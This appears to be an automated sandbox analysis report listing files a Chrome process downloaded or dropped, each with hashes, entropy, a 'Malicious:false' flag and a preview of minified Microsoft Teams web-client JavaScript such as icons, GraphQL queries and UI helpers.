                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[805610],{211014:(e,t,n)=>{"use strict";n.d(t,{b:()=>i});const i=(0,n(965804).O)({isStudentAvatar:{Bf4jedk:"f1ohpo60"},isParentAvatar:{Bf4jedk:"ff9fk16"}})},516404:(e,t,n)=>{"use strict";function i(e){return'<link\n rel="shortcut icon"\n type="image/x-icon"\n id="teams-favicon"\n href="[[staticsPath]]/evergreen-assets/icons/microsoft_teams_logo_refresh.ico"\n/>','<link\n rel="shortcut icon"\n type="image/x-icon"\n id="teams-favicon"\n href="[[staticsPath]]/evergreen-assets/icons/microsoft_teams_logo_refresh.ico"\n/>'}n.d(t,{A:()=>i})},10247:(e,t,n)=>{"use strict";function i(e){var t="";Array.prototype.join;return t+="<style>\n .preload-title-bar-trim {\n ","mac"===e.osPlatform?t+="\n --preload-title-bar-background-color: rgb(98, 100, 167);\n ":t+="\n --preload-title-bar-background-color: rgb(70, 71, 117);\n ",t+='\n\n background-color: var(--preload-title-bar-bac
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1278)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):1386
                                                                                                                                                                                                                                                                            Entropy (8bit):5.130362677219664
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:24:wp3sp38qMS7y8FskQhyKFfuR/uEcrW5Wg1vvvySQd+qpeM6km6QPTOYb/d:wp3sp3zMS79s7Ffx65Wg6ekxAr/d
                                                                                                                                                                                                                                                                            MD5:175F9CE0D50E2DE6768A229535D48F23
                                                                                                                                                                                                                                                                            SHA1:E94A55A1B95BB9A565B5B0996922E9D3B1194CC5
                                                                                                                                                                                                                                                                            SHA-256:FCD8450132708D00246BEA0E5C712C2592D553370B5A155C74BD453E850D3B82
                                                                                                                                                                                                                                                                            SHA-512:9B7099CDE88F65E918B973F22959885CA7264881ACE0CA3A7A2D3F76FB3CCAEADCC778C5AE2FBA1A86C00BD22B4953B1EC3DD413544F53ED58ED911022236168
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/618332-82f3e580c26e4cde.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[618332],{618332:(e,C,s)=>{s.d(C,{a:()=>n});var a=s(957032),t=s(395225),l=s.n(t),c=s(485529),i=s(829289);const n=(0,c.Ke)({svg:({classes:e})=>(0,a.Y)("svg",{role:"presentation",viewBox:"0 0 32 32",className:e.svg,children:[(0,a.Y)("g",{className:l()(i.Q.outline,e.outlinePart),children:(0,a.Y)("path",{d:"M16 30H2V16C2 8.26801 8.26801 2 16 2C23.732 2 30 8.26801 30 16C30 23.732 23.732 30 16 30ZM10 21V16C10 12.6863 12.6863 10 16 10C19.3137 10 22 12.6863 22 16C22 19.3137 19.3137 22 16 22H11.946C11.6621 24.5935 10.288 26.6306 8.51875 28H16C22.6274 28 28 22.6274 28 16C28 9.37258 22.6274 4 16 4C9.37258 4 4 9.37258 4 16V27.9112C6.86035 27.4156 10 24.8723 10 21ZM16 20C18.2091 20 20 18.2091 20 16C20 13.7909 18.2091 12 16 12C13.7909 12 12 13.7909 12 16V20H16Z"})}),(0,a.Y)("g",{className:l()(i.Q.filled,e.filledPart),children:(0,a.Y)("path",{d:"M30 16C30 8.26801 23.732 2 16 2C8.26801 2 2 8.
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):465958
                                                                                                                                                                                                                                                                            Entropy (8bit):5.289643058349342
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:6144:3/bEIaqlBDopzwmdMOLoKG5t3qmOoUsKbtypIQw79yE:jDaJpMVqZodIj78E
                                                                                                                                                                                                                                                                            MD5:DF4D043CC93552709C62AC2CAFAA7BFB
                                                                                                                                                                                                                                                                            SHA1:8AA0F88FF55600FB80081347F6BAB47D5B5A9FA8
                                                                                                                                                                                                                                                                            SHA-256:6F4071C208A6068541DA2369149E8722F3A3CF694C6D4FAB11E76DB58EE28430
                                                                                                                                                                                                                                                                            SHA-512:10D5EABB8D7F912126230F3BA769376EE841E7A24CCB4A2A21F613F293E17C249D565D0DAAC11675817076ED4A6A3CF028083890C03B7CE5675D379B2A4B9FF2
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/998790-ac25072fc0bffa05.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[998790],{248700:(e,t,r)=>{"use strict";r.d(t,{p:()=>n});var n=(e,{variables:t})=>t?void 0===t.__fragments?t:t.__fragments:null},406704:(e,t,r)=>{"use strict";r.d(t,{l:()=>o,h:()=>a});var n=r(845155),i=r.n(n),o=(e,t)=>{var r,n,o;const a=null==(r=t.args)?void 0:r.id;i()(a,"Expected an `id` argument");const s=(null==(o=null==(n=t.field)?void 0:n.selectionSet)?void 0:o.selections.filter((e=>"FragmentSpread"===e.kind))).map((e=>e.name.value));i()(1===s.length,"Expected a single fragment spread in the watch node query, instead got `%s`",s.length);const u=s[0],c=t.query.definitions.find((e=>"FragmentDefinition"===e.kind&&e.name.value===u));return i()(c,"Expected document to contain a fragment by name `%s`",u),t.toReference({__typename:c.typeCondition.name.value,id:a})},a=(e,t)=>{var r,n;const o=null==(n=null==(r=t.args)?void 0:r.id)?void 0:n.toString();return i()(o,"Expected an `id` argument"),t
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (12784)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):12892
                                                                                                                                                                                                                                                                            Entropy (8bit):5.2851931540612
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:MSOTrzovZkSm7RnWtWl69Xyx15HbLQ9QVvPqukPk5wId11nrRmfPC4ImdB:MSOTXovZkSm9aWv157LQqVviuGK1dLrG
                                                                                                                                                                                                                                                                            MD5:E95DEA0CDD404F8CB47F05AF0A8C7F43
                                                                                                                                                                                                                                                                            SHA1:2FA2ACE2E817171FD7A1B356EB5546C02401843D
                                                                                                                                                                                                                                                                            SHA-256:D8EC43BD0FAA293FC959F6397748F1320BA5C668B897BD9FC641A5811CCCAC25
                                                                                                                                                                                                                                                                            SHA-512:9284556B41314E895076DC7CFCF9209B831AF8A92929D1E11555489F76725FA05367C909458E5786B55A04DDF5009B5F8AE0B0A3F5AB8AE629168AAA2734276B
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[215111],{578902:(e,t,n)=>{n.d(t,{Z:()=>m});var r=n(513432);function o(e,t){if(!e)return;const n=e;n._virtual||(n._virtual={}),n._virtual.parent=t}var a=n(388504),i=n(35871),s=n(526521),l=n(96215),c=n(949485);const u=(0,n(965804).O)({root:{qhf8xq:"f1euv43f",Bhzewxz:"f15twtuk",oyh7mz:["f1vgc2s3","f1e31b4d"],j35jbq:["f1e31b4d","f1vgc2s3"],Bj3rh1h:"f494woh"}}),d=r.useInsertionEffect,f=e=>{const{element:t,className:n}=(0,a.h)(e.mountNode),f=r.useRef(null),p=(e=>{const{targetDocument:t,dir:n}=(0,i.useFluent_unstable)(),o=(0,i.usePortalMountNode)(),a=(0,l.Y)(),f=u(),p=(0,i.useThemeClassName_unstable)(),m=(0,s.z)(p,f.root,e.className),b=null!=o?o:null==t?void 0:t.body,v=(0,c.K)((()=>{if(void 0===b||e.disabled)return[null,()=>null];const t=b.ownerDocument.createElement("div");return b.appendChild(t),[t,()=>t.remove()]}),[b]);return d?d((()=>{if(!v)return;const e=m.split(" ").filter(Bo
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (23865)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):23973
                                                                                                                                                                                                                                                                            Entropy (8bit):5.061416340897368
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:WK8oz4zTk9y1b23kwfxZ8ZyWT+aTx919J63THsp+MaohwYz8XWOFmTRvVMBKJOHp:J8E4zTk/kwf/8ZyWT+aT163THO+MNOYQ
                                                                                                                                                                                                                                                                            MD5:EDDB2A60AB61195FF094AE85C1DE3815
                                                                                                                                                                                                                                                                            SHA1:F94EE597E6C191263FE264045F892F2F922F6D7C
                                                                                                                                                                                                                                                                            SHA-256:4A4F93510554358AA41E4CF43916D09A24D69B9F8156857794B37D2AB6498C16
                                                                                                                                                                                                                                                                            SHA-512:AE67BADE2413A160DFD7BBA53CF2131EAB65F490B70B9C42927C7900401F872A0931379A18E2AFBBA1ACCA093CD39C72BF3DFC38558179B4827623E02A610217
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[965787],{859960:function(t,e,n){var o,i=this&&this.__extends||(o=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var n in e)e.hasOwnProperty(n)&&(t[n]=e[n])},function(t,e){function n(){this.constructor=t}o(t,e),t.prototype=null===e?Object.create(e):(n.prototype=e.prototype,new n)});Object.defineProperty(e,"__esModule",{value:!0});var r=function(t){function e(){return null!==t&&t.apply(this,arguments)||this}return i(e,t),e}(n(844549).default);e.default=r},844549:(t,e,n)=>{Object.defineProperty(e,"__esModule",{value:!0});var o=n(743203),i=n(139052),r=function(){function t(t){this.root=null,this.compare=t||o.defaultCompare,this.nElements=0}return t.prototype.add=function(t){return!o.isUndefined(t)&&(null!==this.insertNode(this.createNode(t))&&(this.nElements++,!0))},t.prototype.clear=function(){this.root=null,this.nElements=
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (52830)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):52938
                                                                                                                                                                                                                                                                            Entropy (8bit):5.41823633886219
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:v92b3BHIzsumAVhQQCWPBoNiiFsKO8etKKyJGTs2tDebpXITb1QlMV61X9W5r6EI:YaToNiiqVsaq14GeEtBive3
                                                                                                                                                                                                                                                                            MD5:0017DD95798953D1D4CC0242811AC190
                                                                                                                                                                                                                                                                            SHA1:618E03782D536621BB50C0B632A29E0A8596115D
                                                                                                                                                                                                                                                                            SHA-256:7468DDE41E6EF1F5D223EE27F7163A1AA44D0459CDB3208AF3C8B6789D672FB5
                                                                                                                                                                                                                                                                            SHA-512:8BED877CE9A91ABBE36A98A92AE1A7FAB03C755A2935A0A9A2BA3D46CB8D4127582C45A25BEC160509B583905D01290B9D51C0B471EA0C2FBDE4C4BD8473E363
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[455485],{568954:(e,t,n)=>{n.d(t,{e:()=>S});var r=n(362328);const s={kind:"Document",get definitions(){const e=(0,r.G)("query twoWaySmsFriendlyName {twoWaySmsFriendlyName @client}");return delete this.definitions,this.definitions=e.definitions}};var i=n(727780),a=n(277362),o=n(364819),l=n(37858),c=n(389423),p=n(181031),u=n(820092),d=n(572608),h=n(780800),m=n(355515),g=n(34655),f=n(967400);const y={kind:"Document",get definitions(){const e=(0,r.G)("query ComponentsPeoplePickerPhonelinkSmsPairingStatusQuery {getPhonelinkSmsPairingStatus}");return delete this.definitions,this.definitions=e.definitions}};var b;class S{}b=S,S.getResultsForTwoWaySMS=(e,t,n,r,s)=>b.getPeoplePickerItem(e.trim(),t,n,r,s).then((e=>e?[e]:[])),S.getPeoplePickerItem=(e,t,n,r,s)=>(0,o.isEmpty)(e)?k("Empty query"):(0,l.B9)(e)?k("Invalid query"):b.getPstnPickerItem(e,t,r,n,s),S.getPstnPickerItem=async(e,t,n,r
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (61326)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):61434
                                                                                                                                                                                                                                                                            Entropy (8bit):5.350445065198728
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:lrD1qUVrrg/aqwUs4xiOqWSe5T/EgpRZhBJ/jnr/jIBp203u2:ztCaqwUs4xiOqWSe5T/EgpRZhBJ/jnru
                                                                                                                                                                                                                                                                            MD5:06F59A4DB11AAA6C70C720875D563F47
                                                                                                                                                                                                                                                                            SHA1:15C7F259EEF5238AE04DC6DDDF406503E40ED7B3
                                                                                                                                                                                                                                                                            SHA-256:831A78A264BA5D32EF787C549ED56983B0B676FBB8A1831F3EEF510C6F735D54
                                                                                                                                                                                                                                                                            SHA-512:FAC67D519D7CC24A8D0CAB0A9FAABCFCFF08689A1D06F2FD0ACABA7CE1F760AC6C20C616A98578B0941868DC535927EA8E978CA4D9EF34C486FB0BB76E066A55
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[554072],{881603:(e,r,t)=>{t.d(r,{AH:()=>n,O0:()=>a});var o=t(880175);const n=e=>o.Ss.from(e,"base64").toString("utf8"),a=e=>o.Ss.from(e,"utf8").toString("base64")},880175:(e,r,t)=>{t.d(r,{Km:()=>n,Xg:()=>a,JR:()=>s,Ss:()=>c});var o=t(485202);function n(e,r){switch(r){case"base64":return o.fromByteArray(e);case"utf8":case"utf-8":case void 0:return(new TextDecoder).decode(e);default:throw new Error("invalid/unsupported encoding")}}const a=(e,r)=>c.from(e,r).buffer,s=(e,r)=>c.from(e).toString(r);function i(e){const r=e;return e instanceof ArrayBuffer||"object"==typeof r&&null!==r&&"number"==typeof r.byteLength&&"function"==typeof r.slice&&void 0===r.byteOffset&&void 0===r.buffer}class c extends Uint8Array{toString(e){return n(this,e)}static from(e,r,t){if("string"==typeof e)return c.fromString(e,r);if(null!==e&&"object"==typeof e&&i(e.buffer))return c.fromArrayBuffer(e.buffer,e.
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (8753)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):8861
                                                                                                                                                                                                                                                                            Entropy (8bit):4.889317897367703
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:9TX7H7X6xHIWlN+Q4fN+886lp2SXW1BoQDScNvHILSzLtYr8k:9b7Hj6xP4d86I1BoYScNvMSzA
                                                                                                                                                                                                                                                                            MD5:CB840FABB77752725FBBBA7CE3B7D07C
                                                                                                                                                                                                                                                                            SHA1:812ECBAE9B9B2FB5A26A39C53CAE1F66B7D8EB56
                                                                                                                                                                                                                                                                            SHA-256:693E4EE76589A587C66DD4CE12E0ECE09C39306A83F651CF08D789AD8CD2CB87
                                                                                                                                                                                                                                                                            SHA-512:D32F72EBD2FE576331C593C77D682E784596325BFD7BE19FCF9DD0761A0908BF88450BA08DB3B3A02F21377F7B8423361293FA2437D16F42CE093C64732B860C
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/232042-5e4b6be533bec974.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[232042],{749978:(C,a,l)=>{l.d(a,{o:()=>s});var e=l(957032);const s=(0,l(485529).Ke)({svg:({classes:C})=>(0,e.Y)("svg",{role:"presentation",viewBox:"0 0 32 32",className:C.svg,children:[(0,e.Y)("path",{fill:"#FFF",d:"M28.293 8 24 3.707V7.5c0 .275.225.5.5.5h3.793z"}),(0,e.Y)("g",{fill:"#FFF",children:[(0,e.Y)("path",{d:"M24.5 9c-.827 0-1.5-.673-1.5-1.5V3H9.5c-.275 0-.5.225-.5.5v5.56A9.02 9.02 0 0 1 10 9c4.963 0 9 4.037 9 9s-4.037 9-9 9H9v1.5c0 .275.225.5.5.5h19c.275 0 .5-.225.5-.5V9h-4.5z"}),(0,e.Y)("path",{d:"M24 3.707 28.293 8H24.5a.501.501 0 0 1-.5-.5V3.707z"})]}),(0,e.Y)("path",{opacity:".64",fill:"#605E5C",d:"m29.56 7.854-5.414-5.415A1.51 1.51 0 0 0 23.086 2H9.5C8.673 2 8 2.673 8 3.5v5.732c.328-.075.66-.135 1-.173V3.5c0-.275.225-.5.5-.5H23v4.5c0 .827.673 1.5 1.5 1.5H29v19.5c0 .275-.225.5-.5.5h-19a.501.501 0 0 1-.5-.5V27H8v1.5c0 .827.673 1.5 1.5 1.5h19c.827 0 1.5-.673 1.5-1
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (41208)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):41316
                                                                                                                                                                                                                                                                            Entropy (8bit):5.449314839790103
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:Q42uklpV7uhBJ7Xl65N6IGnmNhR7QuByQO8wjWjXVx3jT/jERaAw5aGH2/46u5Z3:Q+0WJTyWnCkQ7yaVh5LZ8WdgKmJw6IGu
                                                                                                                                                                                                                                                                            MD5:8379A737A4ED02AAB09280C8DE34F0EA
                                                                                                                                                                                                                                                                            SHA1:C4008374C17B522D0B4F488B5A0B5C000BE8EDF9
                                                                                                                                                                                                                                                                            SHA-256:934F305FF1F77A3D1DF9AF74F6BE4E2053B2BAA520C119CEEE066322788C3B6A
                                                                                                                                                                                                                                                                            SHA-512:A445199990CA5E470E9664D930E27950D8D1BE46AE8E491A4AC55E82F18B2E3638B472802F217969F00B9CB2FF3C99533921A5D97C288375AC1F16C8280126CF
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/613400-058ed7479cf9fee5.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[613400],{466563:(e,t,a)=>{a.d(t,{Xp:()=>i,AX:()=>o,q0:()=>r,WD:()=>s});var n=a(942016);function i(e,t){return{entity:{type:n.ck.chats,action:n.SY.create,id:o(e)},command:t}}function o(e){return JSON.stringify(e&&e.length>0?e.sort():[])}function r(e,t,a,n){let i={};if(!e)return i;if(e.type===t&&e.action===a){const t=e.options;if(t&&"string"==typeof t)try{i=JSON.parse(t)}catch{n.warn(`Entity options are in unexpected format. Expected a valid stringified JSON object but instead received: ${String(t)}.`)}}else n.warn(`Entity options are (incorrectly) being asked for type and action that do not pertain to the entity. ${String(e.type)} != ${String(t)} or ${String(e.action)} != ${String(a)}`);return i}const s=e=>`${e.substring(0,32)}00000000${e.substring(40)}`},403376:(e,t,a)=>{a.d(t,{r:()=>i});var n=a(362328);const i={kind:"Document",get definitions(){const e=(0,n.G)("query message
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (18335)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):18444
                                                                                                                                                                                                                                                                            Entropy (8bit):5.4219475958291286
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:S0xnbFFqEuCnA8oUWVZtpcpWq4si9exVHreCOLEJny:S0xnbFFqb8jqZtkxVHreCOLEJy
                                                                                                                                                                                                                                                                            MD5:D9EDC1D501F5631A7C4E7C37B1AC280A
                                                                                                                                                                                                                                                                            SHA1:CD94885FEFF710323427C8BAF5850F982FC22890
                                                                                                                                                                                                                                                                            SHA-256:1D60EF14C462EAC63FC9546DDEF168A9BF2F86DE4F148D8F253A0D96D284FB75
                                                                                                                                                                                                                                                                            SHA-512:9966A040C7C492ADCD0F13E7CF6369719A638ADCC80D9F6107038030E968E622C8E1DB74B9321D040450F5B2CB76187E31F4726D0149E52B665CF966A2C10CB0
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[52196],{946187:(e,o,r)=>{r.d(o,{C:()=>t});const t={auto:"auto",belowBase:-1,base:0,overBase:1,topOfBase:2,belowSurfaces:3,surfaceMenu:1e3,backdrop:1e3,callout:1e3,tooltip:1010,searchBox:1010,searchBoxSurfaceMenu:1010,monitor:1e3,shell:1030}},742692:(e,o,r)=>{r.d(o,{PtS:()=>a});var t=r(693593);const a={borderColor:t.Pt.borderColor,borderStyle:t.Pt.borderStyle,borderWidth:t.Pt.borderWidth}},820152:(e,o,r)=>{r.d(o,{T:()=>t});const t={v9Icon:()=>({"& svg":{width:"100%",paddingBottom:"100%",margin:"-4px 0 0 -4px",overflow:"visible"},"& .fui-Icon-filled":{display:"none"},"& .fui-Icon-regular":{display:"inline"},"&:hover":{"& .fui-Icon-filled":{display:"inline"},"& .fui-Icon-regular":{display:"none"}}}),v9CustomSizeIcon:()=>({"& svg":{overflow:"visible"},"& .fui-Icon-filled":{display:"none"},"& .fui-Icon-regular":{display:"inline"},"&:hover":{"& .fui-Icon-filled":{display:"inline"},
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (16818)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):16926
                                                                                                                                                                                                                                                                            Entropy (8bit):4.362870418102451
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:aeT2QchAQIkioSiLpvXvG0jG7qK5nMLnc8tTN2X:ay2SvoDL1G0jEqNtHe
                                                                                                                                                                                                                                                                            MD5:5450896D19CD95D38819ECFC647F50CF
                                                                                                                                                                                                                                                                            SHA1:D24BF7BB706FE338CF431A6E0D1E1F33A8986E30
                                                                                                                                                                                                                                                                            SHA-256:C660FD33AC63B542079EC18942BC44706A72EA66C8578B9AA670CE6374FB6CAF
                                                                                                                                                                                                                                                                            SHA-512:14C56692904F92A014EF75C035F06A401645EC72E2DA2CF96C7CF6DEA28998F13714E44E9A232818193AFC6B17AD9BD408B86082C53F81EB858ED8C90B807412
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/883493-4a109dbe7427e209.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[883493],{883493:(a,c,Z)=>{Z.d(c,{gx6:()=>e,Al9:()=>h,Z4M:()=>m,KNV:()=>v,ODU:()=>M,Ur$:()=>A,a4t:()=>V,OO9:()=>r,uaw:()=>H,tec:()=>o,nSO:()=>s,vlH:()=>U,nUE:()=>n,vmL:()=>P,Vu$:()=>d,f6D:()=>i,yAv:()=>u,nJR:()=>C,L_y:()=>t,DwU:()=>g,lEC:()=>R,p2N:()=>p,tNe:()=>F,Z2I:()=>k,BXb:()=>L,MOA:()=>b,afj:()=>_,oZ6:()=>O,iEn:()=>w,CDz:()=>S,mXj:()=>N,tEH:()=>y,nUM:()=>D});var l=Z(693935);const e=(0,l.U)("Organization20Filled","20",["M7 5a3 3 0 1 1 3.5 2.96V9.5h3c.83 0 1.5.67 1.5 1.5v1.04a3 3 0 1 1-1 0V11a.5.5 0 0 0-.5-.5h-7a.5.5 0 0 0-.5.5v1.04a3 3 0 1 1-1 0V11c0-.83.67-1.5 1.5-1.5h3V7.96A3 3 0 0 1 7 5Z"]),h=(0,l.U)("Organization20Regular","20",["M10 2a3 3 0 0 0-.5 5.96V9.5h-3c-.83 0-1.5.67-1.5 1.5v1.04a3 3 0 1 0 1 0V11c0-.28.22-.5.5-.5h7c.28 0 .5.22.5.5v1.04a3 3 0 1 0 1 0V11c0-.83-.67-1.5-1.5-1.5h-3V7.96A3 3 0 0 0 10 2ZM8 5a2 2 0 1 1 4 0 2 2 0 0 1-4 0ZM3.5 15a2 2 0 1 1 4 0 2 2 0 0 1-4
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (43697)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):43805
                                                                                                                                                                                                                                                                            Entropy (8bit):5.193563104572617
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:+Hi0uC0FLlYLYBwV9z/ZIZ7641CRkxPwMtMPC4r5OTjPld9dqaDDdXbNhClnYKil:mjOw1/o70KjPl/MYpDPwavNwEpABCyvY
                                                                                                                                                                                                                                                                            MD5:7180615CD9FD4DD6181DD3FA62331129
                                                                                                                                                                                                                                                                            SHA1:B2ED0F21CE2880230129958D3027800EF1BDE16A
                                                                                                                                                                                                                                                                            SHA-256:4080AA62F00EED62B77F8B29E0BA83B62FE1C94DAFB4D306BC2998F1ACE25F11
                                                                                                                                                                                                                                                                            SHA-512:B864101D15FCB41FC0548B7BD4F2843A8D2B32B166EDC9CB609F32181B1E7D8C2BEDC6FD11B61001044D0510A76CEEFAE1EBC0143FF3CB14FE8F9F3D9E7D4251
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[712284],{712284:(e,t,n)=>{n.d(t,{Mp:()=>Ve,Hd:()=>pt,vL:()=>oe,cA:()=>be,IG:()=>ye,fp:()=>M,y$:()=>N,fH:()=>w,Sj:()=>P,Vy:()=>S,sl:()=>I,fF:()=>tt,E5:()=>f,PM:()=>et,zM:()=>ot,MS:()=>m,FR:()=>y});var r=n(513432),o=n.n(r),i=n(959022),a=n(354055);const l={display:"none"};function s({id:e,value:t}){return o().createElement("div",{id:e,style:l},t)}const c={position:"absolute",width:1,height:1,margin:-1,border:0,padding:0,overflow:"hidden",clip:"rect(0 0 0 0)",clipPath:"inset(100%)",whiteSpace:"nowrap"};function u({id:e,announcement:t}){return o().createElement("div",{id:e,style:c,role:"status","aria-live":"assertive","aria-atomic":!0},t)}const d=(0,r.createContext)(null);function f(e){const t=(0,r.useContext)(d);(0,r.useEffect)((()=>{if(!t)throw new Error("useDndMonitor must be used within a children of <DndContext>");return t(e)}),[e,t])}const h={draggable:"\n To pick up a dr
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (37256)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):37364
                                                                                                                                                                                                                                                                            Entropy (8bit):5.170958810990217
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:BgwG2MtRs/YW7+g5UBj74DvpttZwJbhTJrSK4VxjPHRYOI+AmOkmMOkxp+hg8XFw:UHaYWSg57DvpttZwJbhTJrSK4VxjPHRp
                                                                                                                                                                                                                                                                            MD5:52534697E120336121D1A6AAC1B71E1F
                                                                                                                                                                                                                                                                            SHA1:6E1D1AE84312C249D20F0E215028564CE2DE987A
                                                                                                                                                                                                                                                                            SHA-256:6EDEF2224A589C15EA4E9964C7E419F8FE8DA1492F7A9E0119F55486E10E62D2
                                                                                                                                                                                                                                                                            SHA-512:D3FDDB3E2724B73063249F6DFC96FC0DFC030D4EB696B15CDD1C8A861024489F80E6BE4A82DC86F1109C1CB2D7FA62CBF6BB6307B06ED246A85042CCC93D2C4F
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/918681-ba768de32ce52fb9.js
